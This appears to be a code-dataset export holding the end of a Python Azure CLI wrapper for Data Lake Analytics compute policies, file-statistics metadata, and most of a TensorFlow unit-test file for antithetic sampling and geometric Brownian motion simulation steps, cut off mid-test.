- resource_group -- If not specified, will attempt to discover the resource group for the specified Data Lake Analytics account.
'''
return _call_az("az dla account compute-policy list", locals())
def show(account, compute_policy_name, resource_group=None):
'''
Retrieve a compute policy in a Data Lake Analytics account.
Required Parameters:
- account -- Name of the Data Lake Analytics account.
- compute_policy_name -- The name of the compute policy to retrieve.
Optional Parameters:
- resource_group -- If not specified, will attempt to discover the resource group for the specified Data Lake Analytics account.
'''
return _call_az("az dla account compute-policy show", locals())
def delete(account, compute_policy_name, resource_group=None):
'''
Delete a compute policy in a Data Lake Analytics account.
Required Parameters:
- account -- Name of the Data Lake Analytics account.
- compute_policy_name -- The name of the compute policy to delete.
Optional Parameters:
- resource_group -- If not specified, will attempt to discover the resource group for the specified Data Lake Analytics account.
'''
return _call_az("az dla account compute-policy delete", locals())
| 36.428571
| 135
| 0.724421
| 382
| 2,805
| 5.143979
| 0.133508
| 0.1257
| 0.152672
| 0.170992
| 0.847837
| 0.847837
| 0.847837
| 0.806107
| 0.806107
| 0.806107
| 0
| 0
| 0.202496
| 2,805
| 76
| 136
| 36.907895
| 0.878409
| 0.634225
| 0
| 0
| 0
| 0
| 0.212304
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.454545
| false
| 0
| 0.090909
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
48e147a4b3ac81a660da152290bbf87c6ddf9f6b
| 39,051
|
py
|
Python
|
simulation_research/tf_risk/dynamics_test.py
|
deepneuralmachine/google-research
|
d2ce2cf0f5c004f8d78bfeddf6e88e88f4840231
|
[
"Apache-2.0"
] | 23,901
|
2018-10-04T19:48:53.000Z
|
2022-03-31T21:27:42.000Z
|
simulation_research/tf_risk/dynamics_test.py
|
deepneuralmachine/google-research
|
d2ce2cf0f5c004f8d78bfeddf6e88e88f4840231
|
[
"Apache-2.0"
] | 891
|
2018-11-10T06:16:13.000Z
|
2022-03-31T10:42:34.000Z
|
simulation_research/tf_risk/dynamics_test.py
|
deepneuralmachine/google-research
|
d2ce2cf0f5c004f8d78bfeddf6e88e88f4840231
|
[
"Apache-2.0"
] | 6,047
|
2018-10-12T06:31:02.000Z
|
2022-03-31T13:59:28.000Z
|
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for stochastic dynamics."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow.compat.v1 as tf # tf
from simulation_research.tf_risk import dynamics
from tensorflow.contrib import stateless as contrib_stateless
class DynamicsTest(tf.test.TestCase):
def assertAllDistinct(self, a, b):
self.assertEqual(a.shape, b.shape)
a = a.flatten()
b = b.flatten()
for i in range(len(a)):
self.assertNotEqual(a[i], b[i])
def test_antithetic_uniform_is_symmetrical(self):
shape = [512]
antithetic_uniform_samples = dynamics.random_antithetic_uniform(shape)
with self.session() as session:
[samples,
sym_samples] = session.run(tf.split(antithetic_uniform_samples, 2))
self.assertAllEqual(samples, 1.0 - sym_samples)
def test_antithetic_uniform_lowers_variance(self):
shape = [512]
num_trials = 128
key_ph = tf.placeholder(shape=(), dtype=tf.int32)
uniform_samples = dynamics.random_uniform(shape, key=key_ph)
antithetic_uniform_samples = dynamics.random_antithetic_uniform(
shape, key=key_ph)
mean_estimator = tf.reduce_mean(uniform_samples)
antithetic_mean_estimator = tf.reduce_mean(antithetic_uniform_samples)
mean_estimates = []
antithetic_mean_estimates = []
with self.session() as session:
for i in range(num_trials):
mean_estimates.append(
session.run(mean_estimator, feed_dict={key_ph: i}))
antithetic_mean_estimates.append(
session.run(antithetic_mean_estimator, feed_dict={key_ph: i}))
self.assertLessEqual(
np.std(antithetic_mean_estimates), np.std(mean_estimates))
def test_antithetic_normal_is_symmetrical(self):
shape = [512]
antithetic_normal_samples = dynamics.random_antithetic_normal(shape)
with self.session() as session:
[samples,
sym_samples] = session.run(tf.split(antithetic_normal_samples, 2))
self.assertAllEqual(samples, -sym_samples)
def test_antithetic_normal_lowers_variance(self):
shape = [512]
num_trials = 128
key_ph = tf.placeholder(shape=(), dtype=tf.int32)
normal_samples = dynamics.random_normal(shape, key=key_ph)
antithetic_normal_samples = dynamics.random_antithetic_normal(
shape, key=key_ph)
mean_estimator = tf.reduce_mean(normal_samples)
antithetic_mean_estimator = tf.reduce_mean(antithetic_normal_samples)
mean_estimates = []
antithetic_mean_estimates = []
with self.session() as session:
for i in range(num_trials):
mean_estimates.append(
session.run(mean_estimator, feed_dict={key_ph: i}))
antithetic_mean_estimates.append(
session.run(antithetic_mean_estimator, feed_dict={key_ph: i}))
self.assertLessEqual(
np.std(antithetic_mean_estimates), np.std(mean_estimates))
def test_gbm_euler_step_output_is_correct(self):
np.random.seed(0)
drift = 0.2
vol = 0.1
t = 0.0
dt = 0.01
num_samples = 8
states = tf.ones([num_samples])
eps_t = np.ndarray.astype(
np.random.normal(size=[num_samples]), dtype=np.float32)
next_states = dynamics.gbm_euler_step(
states, drift, vol, t, dt, random_normal_op=lambda: eps_t)
with self.session() as session:
next_states_eval = session.run(next_states)
self.assertEqual(next_states_eval.shape, (num_samples,))
# Here the maximum discrepancy is 1.17e-7 due to differences in
# numerical implementations between tf and np so we set delta to 1.2e-7.
self.assertAllClose(
next_states_eval,
np.ones([num_samples], dtype=np.float32) *
(1.0 + drift * dt + vol * eps_t * np.sqrt(dt)),
atol=1.2e-7)
def test_gbm_euler_step_expects_static_shape(self):
drift = 0.2
vol = 0.1
t = 0.0
dt = 0.01
states = tf.placeholder(dtype=tf.float32, shape=[None])
with self.assertRaises(ValueError):
dynamics.gbm_euler_step(states, drift, vol, t, dt)
def test_gbm_euler_step_is_deterministic(self):
drift = 0.2
vol = 0.1
t = 0.2
dt = 0.01
num_samples = 8
key = 1337
states = tf.ones([num_samples])
eps_t = contrib_stateless.stateless_random_normal(
shape=[num_samples], seed=[key, int(t / dt)])
next_states = dynamics.gbm_euler_step(
states, drift, vol, t, dt, random_normal_op=lambda: eps_t)
next_states_bis = dynamics.gbm_euler_step(
states, drift, vol, t, dt, key=key)
with self.session() as session:
next_states_eval, next_states_bis_eval = session.run((next_states,
next_states_bis))
self.assertEqual(next_states_eval.shape, (num_samples,))
self.assertEqual(next_states_bis_eval.shape, (num_samples,))
self.assertAllClose(next_states_eval, next_states_bis_eval, atol=1e-7)
def test_gbm_euler_step_output_changes_with_t(self):
drift = 0.2
vol = 0.1
t_0 = 0.2
dt = 0.01
num_samples = 8
t_1 = t_0 + dt
states = tf.ones([num_samples])
next_states_0 = dynamics.gbm_euler_step(states, drift, vol, t_0, dt)
next_states_1 = dynamics.gbm_euler_step(states, drift, vol, t_1, dt)
with self.session() as session:
next_states_0_eval, next_states_1_eval = session.run((next_states_0,
next_states_1))
self.assertEqual(next_states_0_eval.shape, (num_samples,))
self.assertEqual(next_states_1_eval.shape, (num_samples,))
# The step is a bijection w.r.t. dw_t, all terms should be different.
self.assertAllDistinct(next_states_0_eval, next_states_1_eval)
def test_gbm_euler_step_output_changes_with_key(self):
drift = 0.2
vol = 0.1
t = 0.2
dt = 0.01
num_samples = 8
key_0 = 74
key_1 = 75
states = tf.ones([num_samples])
next_states_0 = dynamics.gbm_euler_step(
states, drift, vol, t, dt, key=key_0)
next_states_1 = dynamics.gbm_euler_step(
states, drift, vol, t, dt, key=key_1)
with self.session() as session:
next_states_0_eval, next_states_1_eval = session.run((next_states_0,
next_states_1))
# The step is a bijection w.r.t. dw_t, all terms should be different.
self.assertAllDistinct(next_states_0_eval, next_states_1_eval)
def test_gbm_euler_step_running_max_output_is_correct(self):
np.random.seed(0)
drift = 0.2
vol = 0.1
t = 0.0
dt = 0.01
num_samples = 8
initial_states = np.ones([num_samples], dtype=np.float32)
states_and_max = [tf.constant(initial_states)] * 2
eps_t = np.ndarray.astype(
np.random.normal(size=[num_samples]), dtype=np.float32)
(next_states, next_max) = dynamics.gbm_euler_step_running_max(
states_and_max,
drift,
vol,
t,
dt,
simulate_bridge=False,
random_normal_op=lambda: eps_t)
with self.session() as session:
(next_states_eval, next_max_eval) = session.run((next_states, next_max))
self.assertEqual(next_states_eval.shape, (num_samples,))
self.assertEqual(next_max_eval.shape, (num_samples,))
expected_next_states = initial_states * (1.0 + drift * dt +
vol * eps_t * np.sqrt(dt))
expected_next_max = np.maximum(expected_next_states, initial_states)
# Here the maximum discrepancy is 1.17e-7 due to differences in
# numerical implementations between tf and np so we set delta to 1.2e-7.
self.assertAllClose(
next_states_eval, expected_next_states, atol=1.2e-7)
self.assertAllClose(next_max_eval, expected_next_max, atol=1.2e-7)
def test_gbm_euler_step_running_max_is_deterministic(self):
drift = 0.2
vol = 0.1
t = 0.2
dt = 0.01
num_samples = 8
key = 1337
states_and_max = [tf.ones([num_samples])] * 2
eps_t = contrib_stateless.stateless_random_normal(
shape=[num_samples], seed=[key, int(t / dt)])
next_states_and_max = dynamics.gbm_euler_step_running_max(
states_and_max,
drift,
vol,
t,
dt,
simulate_bridge=False,
random_normal_op=lambda: eps_t)
next_states_and_max_bis = dynamics.gbm_euler_step_running_max(
states_and_max, drift, vol, t, dt, simulate_bridge=False, key=key)
with self.session() as session:
next_states_and_max_eval, next_states_and_max_bis_eval = session.run(
(next_states_and_max, next_states_and_max_bis))
next_states_eval, next_max_eval = next_states_and_max_eval
next_states_bis_eval, next_max_bis_eval = next_states_and_max_bis_eval
self.assertEqual(next_states_eval.shape, (num_samples,))
self.assertEqual(next_states_bis_eval.shape, (num_samples,))
self.assertEqual(next_max_eval.shape, (num_samples,))
self.assertEqual(next_max_bis_eval.shape, (num_samples,))
self.assertAllClose(next_states_eval, next_states_bis_eval)
self.assertAllClose(next_max_eval, next_max_bis_eval)
def test_gbm_euler_step_running_max_expects_static_shape_left_member(self):
drift = 0.2
vol = 0.1
t = 0.2
dt = 0.01
num_samples = 8
states_and_max = [
tf.placeholder(dtype=tf.float32, shape=[None]), tf.ones([num_samples])]
with self.assertRaises(ValueError):
dynamics.gbm_euler_step_running_max(states_and_max, drift, vol, t, dt)
def test_gbm_euler_step_running_max_expects_static_shape_right_member(self):
drift = 0.2
vol = 0.1
t = 0.2
dt = 0.01
num_samples = 8
states_and_max = [
tf.ones([num_samples]), tf.placeholder(dtype=tf.float32, shape=[None])]
with self.assertRaises(ValueError):
dynamics.gbm_euler_step_running_max(states_and_max, drift, vol, t, dt)
def test_gbm_euler_step_running_max_expects_static_shape_both_members(self):
drift = 0.2
vol = 0.1
t = 0.2
dt = 0.01
states_and_max = [
tf.placeholder(dtype=tf.float32, shape=[None]),
tf.placeholder(dtype=tf.float32, shape=[None])]
with self.assertRaises(ValueError):
dynamics.gbm_euler_step_running_max(states_and_max, drift, vol, t, dt)
def test_gbm_euler_step_running_max_changes_with_t(self):
drift = 0.2
vol = 0.1
t_0 = 0.2
dt = 0.01
num_samples = 8
t_1 = t_0 + dt
states_and_max = [tf.ones([num_samples])] * 2
next_states_and_max_0 = dynamics.gbm_euler_step_running_max(
states_and_max, drift, vol, t_0, dt, simulate_bridge=False)
next_states_and_max_1 = dynamics.gbm_euler_step_running_max(
states_and_max, drift, vol, t_1, dt, simulate_bridge=False)
with self.session() as session:
next_states_and_max_0_eval, next_states_and_max_1_eval = session.run(
(next_states_and_max_0, next_states_and_max_1))
next_states_0_eval, next_max_0_eval = next_states_and_max_0_eval
next_states_1_eval, next_max_1_eval = next_states_and_max_1_eval
self.assertEqual(next_states_0_eval.shape, (num_samples,))
self.assertEqual(next_states_1_eval.shape, (num_samples,))
self.assertEqual(next_max_0_eval.shape, (num_samples,))
self.assertEqual(next_max_1_eval.shape, (num_samples,))
# The step is a bijection w.r.t. dw_t, all terms should be different.
# However there is no such guarantee for the running maxima.
self.assertAllDistinct(next_states_0_eval, next_states_1_eval)
def test_gbm_euler_step_running_max_changes_with_key(self):
drift = 0.2
vol = 0.1
t = 0.2
dt = 0.01
num_samples = 8
key_0 = 74
key_1 = 75
states_and_max = [tf.ones([num_samples])] * 2
next_states_and_max_0 = dynamics.gbm_euler_step_running_max(
states_and_max, drift, vol, t, dt, key=key_0, simulate_bridge=False)
next_states_and_max_1 = dynamics.gbm_euler_step_running_max(
states_and_max, drift, vol, t, dt, key=key_1, simulate_bridge=False)
with self.session() as session:
next_states_and_max_0_eval, next_states_and_max_1_eval = session.run(
(next_states_and_max_0, next_states_and_max_1))
next_states_0_eval, next_max_0_eval = next_states_and_max_0_eval
next_states_1_eval, next_max_1_eval = next_states_and_max_1_eval
self.assertEqual(next_states_0_eval.shape, (num_samples,))
self.assertEqual(next_states_1_eval.shape, (num_samples,))
self.assertEqual(next_max_0_eval.shape, (num_samples,))
self.assertEqual(next_max_1_eval.shape, (num_samples,))
# The step is a bijection w.r.t. dw_t, all terms should be different.
# However there is no such guarantee for the running maxima.
self.assertAllDistinct(next_states_0_eval, next_states_1_eval)
def test_gbm_euler_step_running_max_bridge_output_is_correct(self):
np.random.seed(0)
drift = 0.2
vol = 0.1
t = 0.0
dt = 0.01
num_samples = 8
initial_states = np.ones([num_samples], dtype=np.float32)
states_and_max = [tf.constant(initial_states)] * 2
eps_t = np.ndarray.astype(
np.random.normal(size=[num_samples]), dtype=np.float32)
u_t = np.ndarray.astype(
np.random.uniform(size=[num_samples]), dtype=np.float32)
(next_states, next_max) = dynamics.gbm_euler_step_running_max(
states_and_max,
drift,
vol,
t,
dt,
simulate_bridge=True,
random_normal_op=lambda: eps_t,
random_uniform_op=lambda: u_t)
with self.session() as session:
(next_states_eval, next_max_eval) = session.run((next_states, next_max))
self.assertEqual(next_states_eval.shape, (num_samples,))
self.assertEqual(next_max_eval.shape, (num_samples,))
expected_next_states = initial_states * (1.0 + drift * dt +
vol * eps_t * np.sqrt(dt))
expected_bridge_max = 0.5 * (
initial_states + expected_next_states +
np.sqrt((initial_states - expected_next_states)**2 - 2.0 * dt *
(vol * initial_states)**2 * np.log(u_t)))
expected_next_max = np.maximum(expected_next_states, expected_bridge_max)
# Here the maximum discrepancy is 1.17e-7 due to differences in
# numerical implementations between tf and np so we set delta to 1.2e-7.
self.assertAllClose(
next_states_eval, expected_next_states, atol=1.2e-7)
self.assertAllClose(next_max_eval, expected_next_max, atol=1.2e-7)
def test_gbm_euler_step_running_max_bridge_is_deterministic(self):
drift = 0.2
vol = 0.1
t = 0.2
dt = 0.01
num_samples = 8
key = 1337
states_and_max = [tf.ones([num_samples])] * 2
eps_t = contrib_stateless.stateless_random_normal(
shape=[num_samples], seed=[2 * key, int(t / dt)])
u_t = contrib_stateless.stateless_random_uniform(
shape=[num_samples], seed=[2 * key + 1, int(t / dt)])
next_states_and_max = dynamics.gbm_euler_step_running_max(
states_and_max,
drift,
vol,
t,
dt,
simulate_bridge=True,
random_normal_op=lambda: eps_t,
random_uniform_op=lambda: u_t)
next_states_and_max_bis = dynamics.gbm_euler_step_running_max(
states_and_max, drift, vol, t, dt, simulate_bridge=True, key=key)
with self.session() as session:
next_states_and_max_eval, next_states_and_max_bis_eval = session.run(
(next_states_and_max, next_states_and_max_bis))
next_states_eval, next_max_eval = next_states_and_max_eval
next_states_bis_eval, next_max_bis_eval = next_states_and_max_bis_eval
self.assertEqual(next_states_eval.shape, (num_samples,))
self.assertEqual(next_states_bis_eval.shape, (num_samples,))
self.assertEqual(next_max_eval.shape, (num_samples,))
self.assertEqual(next_max_bis_eval.shape, (num_samples,))
self.assertAllClose(next_states_eval, next_states_bis_eval)
self.assertAllClose(next_max_eval, next_max_bis_eval)
def test_gbm_euler_step_running_max_bridge_changes_with_t(self):
drift = 0.2
vol = 0.1
t_0 = 0.2
dt = 0.01
num_samples = 8
t_1 = t_0 + dt
states_and_max = [tf.ones([num_samples])] * 2
next_states_and_max_0 = dynamics.gbm_euler_step_running_max(
states_and_max, drift, vol, t_0, dt, simulate_bridge=True)
next_states_and_max_1 = dynamics.gbm_euler_step_running_max(
states_and_max, drift, vol, t_1, dt, simulate_bridge=True)
with self.session() as session:
next_states_and_max_0_eval, next_states_and_max_1_eval = session.run(
(next_states_and_max_0, next_states_and_max_1))
next_states_0_eval, next_max_0_eval = next_states_and_max_0_eval
next_states_1_eval, next_max_1_eval = next_states_and_max_1_eval
self.assertEqual(next_states_0_eval.shape, (num_samples,))
self.assertEqual(next_states_1_eval.shape, (num_samples,))
self.assertEqual(next_max_0_eval.shape, (num_samples,))
self.assertEqual(next_max_1_eval.shape, (num_samples,))
# The step is a bijection w.r.t. dw_t, all terms should be different.
# However there is no such guarantee for the running maxima.
self.assertAllDistinct(next_states_0_eval, next_states_1_eval)
def test_gbm_euler_step_running_max_bridge_changes_with_key(self):
drift = 0.2
vol = 0.1
t = 0.2
dt = 0.01
num_samples = 8
key_0 = 74
key_1 = 75
states_and_max = [tf.ones([num_samples])] * 2
next_states_and_max_0 = dynamics.gbm_euler_step_running_max(
states_and_max, drift, vol, t, dt, key=key_0, simulate_bridge=True)
next_states_and_max_1 = dynamics.gbm_euler_step_running_max(
states_and_max, drift, vol, t, dt, key=key_1, simulate_bridge=True)
with self.session() as session:
next_states_and_max_0_eval, next_states_and_max_1_eval = session.run(
(next_states_and_max_0, next_states_and_max_1))
next_states_0_eval, next_max_0_eval = next_states_and_max_0_eval
next_states_1_eval, next_max_1_eval = next_states_and_max_1_eval
self.assertEqual(next_states_0_eval.shape, (num_samples,))
self.assertEqual(next_states_1_eval.shape, (num_samples,))
self.assertEqual(next_max_0_eval.shape, (num_samples,))
self.assertEqual(next_max_1_eval.shape, (num_samples,))
# The step is a bijection w.r.t. dw_t, all terms should be different.
# However there is no such guarantee for the running maxima.
self.assertAllDistinct(next_states_0_eval, next_states_1_eval)
def test_gbm_euler_step_running_sum_output_is_correct(self):
np.random.seed(0)
drift = 0.2
vol = 0.1
t = 0.0
dt = 0.01
num_samples = 8
initial_states = np.ones([num_samples], dtype=np.float32)
states_and_sums = [tf.constant(initial_states)] * 2
eps_t = np.ndarray.astype(
np.random.normal(size=[num_samples]), dtype=np.float32)
(next_states, next_sums) = dynamics.gbm_euler_step_running_sum(
states_and_sums, drift, vol, t, dt, random_normal_op=lambda: eps_t)
with self.session() as session:
(next_states_eval, next_sums_eval) = session.run((next_states, next_sums))
self.assertEqual(next_states_eval.shape, (num_samples,))
self.assertEqual(next_sums_eval.shape, (num_samples,))
expected_next_states = initial_states * (1.0 + drift * dt +
vol * eps_t * np.sqrt(dt))
expected_next_sums = expected_next_states + initial_states
# Here the maximum discrepancy is 1.17e-7 due to differences in
# numerical implementations between tf and np so we set delta to 1.2e-7.
self.assertAllClose(next_states_eval, expected_next_states, atol=1.2e-7)
self.assertAllClose(next_sums_eval, expected_next_sums, atol=1.2e-7)
def test_gbm_euler_step_running_sum_expects_static_shape_left_member(self):
drift = 0.2
vol = 0.1
t = 0.2
dt = 0.01
num_samples = 8
states_and_sums = [
tf.placeholder(dtype=tf.float32, shape=[None]), tf.ones([num_samples])]
with self.assertRaises(ValueError):
dynamics.gbm_euler_step_running_sum(states_and_sums, drift, vol, t, dt)
def test_gbm_euler_step_running_sum_expects_static_shape_right_member(self):
drift = 0.2
vol = 0.1
t = 0.2
dt = 0.01
num_samples = 8
states_and_sums = [
tf.ones([num_samples]), tf.placeholder(dtype=tf.float32, shape=[None])]
with self.assertRaises(ValueError):
dynamics.gbm_euler_step_running_sum(states_and_sums, drift, vol, t, dt)
def test_gbm_euler_step_running_sum_expects_static_shape_both_members(self):
drift = 0.2
vol = 0.1
t = 0.2
dt = 0.01
states_and_sums = [
tf.placeholder(dtype=tf.float32, shape=[None]),
tf.placeholder(dtype=tf.float32, shape=[None])]
with self.assertRaises(ValueError):
dynamics.gbm_euler_step_running_sum(states_and_sums, drift, vol, t, dt)
def test_gbm_euler_step_running_sum_is_deterministic(self):
drift = 0.2
vol = 0.1
t = 0.2
dt = 0.01
num_samples = 8
key = 1337
states_and_sums = [tf.ones([num_samples])] * 2
eps_t = contrib_stateless.stateless_random_normal(
shape=[num_samples], seed=[key, int(t / dt)])
next_states_and_sums = dynamics.gbm_euler_step_running_sum(
states_and_sums, drift, vol, t, dt, random_normal_op=lambda: eps_t)
next_states_and_sums_bis = dynamics.gbm_euler_step_running_sum(
states_and_sums, drift, vol, t, dt, key=key)
with self.session() as session:
next_states_and_sums_eval, next_states_and_sums_bis_eval = session.run(
(next_states_and_sums, next_states_and_sums_bis))
next_states_eval, next_sums_eval = next_states_and_sums_eval
next_states_bis_eval, next_sums_bis_eval = next_states_and_sums_bis_eval
self.assertEqual(next_states_eval.shape, (num_samples,))
self.assertEqual(next_states_bis_eval.shape, (num_samples,))
self.assertEqual(next_sums_eval.shape, (num_samples,))
self.assertEqual(next_sums_bis_eval.shape, (num_samples,))
self.assertAllClose(next_states_eval, next_states_bis_eval)
self.assertAllClose(next_sums_eval, next_sums_bis_eval)
def test_gbm_euler_step_running_sum_changes_with_t(self):
drift = 0.2
vol = 0.1
t_0 = 0.2
dt = 0.01
num_samples = 8
t_1 = t_0 + dt
states_and_sums = [tf.ones([num_samples])] * 2
next_states_and_sums_0 = dynamics.gbm_euler_step_running_sum(
states_and_sums, drift, vol, t_0, dt)
next_states_and_sums_1 = dynamics.gbm_euler_step_running_sum(
states_and_sums, drift, vol, t_1, dt)
with self.session() as session:
next_states_and_sums_0_eval, next_states_and_sums_1_eval = session.run(
(next_states_and_sums_0, next_states_and_sums_1))
next_states_0_eval, next_sums_0_eval = next_states_and_sums_0_eval
next_states_1_eval, next_sums_1_eval = next_states_and_sums_1_eval
self.assertEqual(next_states_0_eval.shape, (num_samples,))
self.assertEqual(next_states_1_eval.shape, (num_samples,))
self.assertEqual(next_sums_0_eval.shape, (num_samples,))
self.assertEqual(next_sums_1_eval.shape, (num_samples,))
# The step is a bijection w.r.t. dw_t, all terms should be different.
      # However there is no such guarantee for the running sums.
self.assertAllDistinct(next_states_0_eval, next_states_1_eval)
def test_gbm_euler_step_running_sum_changes_with_key(self):
drift = 0.2
vol = 0.1
t = 0.2
dt = 0.01
num_samples = 8
key_0 = 74
key_1 = 75
states_and_sums = [tf.ones([num_samples])] * 2
next_states_and_sums_0 = dynamics.gbm_euler_step_running_sum(
states_and_sums, drift, vol, t, dt, key=key_0)
next_states_and_sums_1 = dynamics.gbm_euler_step_running_sum(
states_and_sums, drift, vol, t, dt, key=key_1)
with self.session() as session:
next_states_and_sums_0_eval, next_states_and_sums_1_eval = session.run(
(next_states_and_sums_0, next_states_and_sums_1))
next_states_0_eval, next_sums_0_eval = next_states_and_sums_0_eval
next_states_1_eval, next_sums_1_eval = next_states_and_sums_1_eval
self.assertEqual(next_states_0_eval.shape, (num_samples,))
self.assertEqual(next_states_1_eval.shape, (num_samples,))
self.assertEqual(next_sums_0_eval.shape, (num_samples,))
self.assertEqual(next_sums_1_eval.shape, (num_samples,))
# The step is a bijection w.r.t. dw_t, all terms should be different.
      # However there is no such guarantee for the running sums.
self.assertAllDistinct(next_states_0_eval, next_states_1_eval)
def test_gbm_euler_step_nd_output_is_correct(self):
np.random.seed(0)
drift = np.asarray([0.1, 0.3, -0.05], dtype=np.float32)
vol_matrix = 0.2 * np.asarray(
[[1.5, 0.2, 0.3], [0.2, 1.1, -0.1], [0.3, -0.1, 0.8]], dtype=np.float32)
t = 0.0
dt = 0.01
num_samples = 8
num_dims = drift.shape[0]
states = tf.ones([num_samples, num_dims])
eps_t = np.ndarray.astype(
np.random.normal(size=[num_samples, num_dims]), dtype=np.float32)
next_states = dynamics.gbm_euler_step_nd(
states, drift, vol_matrix, t, dt, random_normal_op=lambda: eps_t)
with self.session() as session:
next_states_eval = session.run(next_states)
self.assertEqual(next_states_eval.shape, (num_samples, num_dims))
for i in range(num_samples):
self.assertAllClose(
next_states_eval[i],
np.ones([num_dims], dtype=np.float32) *
(1.0 + drift * dt + np.matmul(vol_matrix, eps_t[i] * np.sqrt(dt))))
def test_gbm_euler_step_nd_expects_static_shape(self):
drift = np.asarray([0.1, 0.3, -0.05], dtype=np.float32)
vol_matrix = 0.2 * np.asarray(
[[1.5, 0.2, 0.3], [0.2, 1.1, -0.1], [0.3, -0.1, 0.8]], dtype=np.float32)
t = 0.0
dt = 0.01
num_dims = drift.shape[0]
states = tf.placeholder(dtype=tf.float32, shape=[None, num_dims])
with self.assertRaises(ValueError):
dynamics.gbm_euler_step_nd(states, drift, vol_matrix, t, dt)
def test_gbm_euler_step_nd_is_deterministic(self):
drift = np.asarray([0.1, 0.3, -0.05], dtype=np.float32)
vol_matrix = 0.2 * np.asarray(
[[1.5, 0.2, 0.3], [0.2, 1.1, -0.1], [0.3, -0.1, 0.8]], dtype=np.float32)
t = 0.3
dt = 0.01
num_samples = 8
num_dims = drift.shape[0]
key = 42
states = tf.ones([num_samples, num_dims])
eps_t = contrib_stateless.stateless_random_normal(
shape=[num_samples, num_dims], seed=[key, int(t / dt)])
next_states = dynamics.gbm_euler_step_nd(
states, drift, vol_matrix, t, dt, random_normal_op=lambda: eps_t)
next_states_bis = dynamics.gbm_euler_step_nd(
states, drift, vol_matrix, t, dt, key=key)
with self.session() as session:
next_states_eval, next_states_bis_eval = session.run((next_states,
next_states_bis))
self.assertEqual(next_states_eval.shape, (num_samples, num_dims))
self.assertEqual(next_states_bis_eval.shape, (num_samples, num_dims))
self.assertAllClose(next_states_eval, next_states_bis_eval)
def test_gbm_euler_step_nd_output_changes_with_t(self):
drift = np.asarray([0.1, 0.3, -0.05], dtype=np.float32)
vol_matrix = 0.2 * np.asarray(
[[1.5, 0.2, 0.3], [0.2, 1.1, -0.1], [0.3, -0.1, 0.8]], dtype=np.float32)
t_0 = 0.3
dt = 0.01
num_samples = 8
num_dims = drift.shape[0]
t_1 = t_0 + dt
states = tf.ones([num_samples, num_dims])
next_states_0 = dynamics.gbm_euler_step_nd(states, drift, vol_matrix, t_0,
dt)
next_states_1 = dynamics.gbm_euler_step_nd(states, drift, vol_matrix, t_1,
dt)
with self.session() as session:
next_states_0_eval, next_states_1_eval = session.run((next_states_0,
next_states_1))
self.assertEqual(next_states_0_eval.shape, (num_samples, num_dims))
self.assertEqual(next_states_1_eval.shape, (num_samples, num_dims))
# The step is a bijection w.r.t. dw_t, all terms should be different.
self.assertAllDistinct(next_states_0_eval, next_states_1_eval)
def test_gbm_euler_step_nd_output_changes_with_key(self):
drift = np.asarray([0.1, 0.3, -0.05], dtype=np.float32)
vol_matrix = 0.2 * np.asarray(
[[1.5, 0.2, 0.3], [0.2, 1.1, -0.1], [0.3, -0.1, 0.8]], dtype=np.float32)
t = 0.3
dt = 0.01
num_samples = 8
num_dims = drift.shape[0]
key_0 = 42
key_1 = 77
states = tf.ones([num_samples, num_dims])
next_states_0 = dynamics.gbm_euler_step_nd(
states, drift, vol_matrix, t, dt, key=key_0)
next_states_1 = dynamics.gbm_euler_step_nd(
states, drift, vol_matrix, t, dt, key=key_1)
with self.session() as session:
next_states_0_eval, next_states_1_eval = session.run((next_states_0,
next_states_1))
self.assertEqual(next_states_0_eval.shape, (num_samples, num_dims))
self.assertEqual(next_states_1_eval.shape, (num_samples, num_dims))
# The step is a bijection w.r.t. dw_t, all terms should be different.
self.assertAllDistinct(next_states_0_eval, next_states_1_eval)
def test_gbm_log_euler_step_output_is_correct(self):
np.random.seed(0)
drift = 0.2
vol = 0.1
t = 0.0
dt = 0.01
num_samples = 8
log_states = tf.zeros([num_samples])
eps_t = np.ndarray.astype(
np.random.normal(size=[num_samples]), dtype=np.float32)
next_log_states = dynamics.gbm_log_euler_step(
log_states, drift, vol, t, dt, random_normal_op=lambda: eps_t)
with self.session() as session:
next_log_states_eval = session.run(next_log_states)
self.assertEqual(next_log_states_eval.shape, (num_samples,))
self.assertAllClose(
next_log_states_eval,
np.zeros([num_samples], dtype=np.float32) +
(drift - 0.5 * (vol**2)) * dt + vol * eps_t * np.sqrt(dt))
def test_gbm_log_euler_step_expects_static_shape(self):
drift = 0.2
vol = 0.1
t = 0.0
dt = 0.01
log_states = tf.placeholder(dtype=tf.float32, shape=[None])
with self.assertRaises(ValueError):
dynamics.gbm_log_euler_step(log_states, drift, vol, t, dt)
def test_gbm_log_euler_step_is_deterministic(self):
drift = 0.2
vol = 0.1
t = 0.0
dt = 0.01
num_samples = 8
key = 13
log_states = tf.zeros([num_samples])
eps_t = contrib_stateless.stateless_random_normal(
shape=[num_samples], seed=[key, int(t / dt)])
next_log_states = dynamics.gbm_log_euler_step(
log_states, drift, vol, t, dt, random_normal_op=lambda: eps_t)
next_log_states_bis = dynamics.gbm_log_euler_step(
log_states, drift, vol, t, dt, key=key)
with self.session() as session:
next_log_states_eval, next_log_states_bis_eval = session.run(
(next_log_states, next_log_states_bis))
self.assertEqual(next_log_states_eval.shape, (num_samples,))
self.assertEqual(next_log_states_bis_eval.shape, (num_samples,))
self.assertAllClose(next_log_states_eval, next_log_states_bis_eval)
def test_gbm_log_euler_step_output_changes_with_t(self):
drift = 0.2
vol = 0.1
t_0 = 0.0
dt = 0.01
num_samples = 8
t_1 = t_0 + dt
log_states = tf.zeros([num_samples])
next_log_states_0 = dynamics.gbm_log_euler_step(log_states, drift, vol, t_0,
dt)
next_log_states_1 = dynamics.gbm_log_euler_step(log_states, drift, vol, t_1,
dt)
